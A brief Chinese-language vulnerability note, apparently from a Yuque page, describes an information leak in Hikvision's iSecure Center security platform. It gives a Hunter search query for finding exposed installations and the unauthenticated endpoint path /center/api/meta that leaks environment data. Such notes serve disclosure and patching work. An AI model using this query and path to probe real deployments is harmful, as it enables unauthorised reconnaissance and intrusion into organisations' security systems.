海康威视iSecure Center综合安防管理平台meta信息泄漏漏洞

一、漏洞简介

HIKVISION 综合安防管理平台meta存在信息泄漏漏洞,攻击者通过漏洞可以获取环境等敏感信息进一步攻击。

二、影响版本

三、资产测绘

hunter查询语法:

app.name=="Hikvision 海康威视 iSecure Center"

1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5.png

1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f.png

四、漏洞复现

/center/api/meta

1717150124074-93684ec4-efd3-4ec9-a16f-3c4795af2dd1.png

更新: 2024-06-01 11:04:37
原文: https://www.yuque.com/xiaokp7/ocvun2/uv9do2qdiuz3vefk